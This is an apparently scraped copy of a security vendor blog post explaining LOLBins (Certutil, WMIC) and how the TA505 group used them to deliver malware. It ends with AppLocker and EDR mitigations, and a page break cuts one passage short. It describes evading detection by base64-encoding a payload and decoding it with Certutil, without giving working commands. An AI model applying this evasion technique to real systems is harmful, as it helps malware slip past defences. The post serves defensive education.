Professional Documents
Culture Documents
- SecurityHQ
Security 101: What are LOLBins and How Can They be Used Maliciously?
by Nikhil Mohanlal, Eleanor Barlow • Aug 2021
There are many abbreviations commonly used in the tech and cyber industry. Some are more familiar than others, and while a few people may first associate the
idea of LOLBins with laughing trash bags, those in security and IT need to understand their importance and how they can be used, both for harmless and
malicious activities.
Initially, LOLBins were commonly used in a post-exploitation basis, to gain persistence or escalate privileges. However, the local system binaries or the
preinstalled tools on a machine are now being used to bypass detection and aid in malware delivery. Which means that malicious actors can use these LOLBins
to achieve their goals, without relying on specific code or files.
LOLBins are often Microsoft signed binaries. Such as Certutil, Windows Management Instrumentation Command-line (WMIC). They can be used for a range of
attacks, including executing code, to performing file operations (downloading, uploading, copying, etc.), to stealing passwords.
TA505
The Cybercrime group by the name of TA505, for instance, have used LOLBins in the past to bypass windows detection and deliver their ServHelper malware
via a spear phishing campaign targeting Brazilian entities.
‘By using distributing systems, such as Necurs botnet, the group have been widely recognised since 2014 for their malleable, adjustable, and extensive
ransomware, malware, trojans and spam operations. The real issue is that TA505 uses localised HTML files in different languages. This means that targets are
made worldwide, in any region, within any vertical. The direct effect TA505 has had on promoting entities, including Globelmposter and other malware options
such as the Trojan FlawedAmmyy, has been significant. The group went quiet for a period, but now TA505 is back to circulating Remote Access Trojans
(RATs), malware downloaders and ransomwares, onto their victim’s technology. After opening a false attachment, the HTML downloads a malicious Excel file
that drops the payload into the victim’s machine. Upon execution, the malware dumps the GraceWire Trojan into the infected device. Attackers also use an IP 1/2
https://www.securityhq.com/blog/security-101-lolbins-malware-exploitation/
15/12/2022 11:08 Security 101: What are LOLBins and How Can They be Used Maliciously? - SecurityHQ
This technique will bypass detection from the system security by encoding the content in the file in base64. Certutil can now be used to decode the malicious
file locally.
BOOM. Hacked. Now you have a malicious file on your system sat undetected. Cool, right?
Mitigation tactics based on MITRE ATT&CK recommendations are to employ AppLocker mechanisms or managing permissions to prevent non-root users
running these commands. This would involve nailing what services are and aren’t necessary to the specific operation, be it anything from HR to IT.
However, there is a fine balance to be had with whitelisting, you don’t want to disrupt day-to-day operations, but you don’t want to keep everything free
flowing!
The first step would be to ensure that your cyber workforce is well equipped with the knowledge and understanding of this behaviour and its impact. Second,
employ a tool that can detect malicious behaviour such as an EDR solution installed across the network. This would aid in detecting and analysing potentially
malicious code being executed on systems regardless of if it is trusted or not.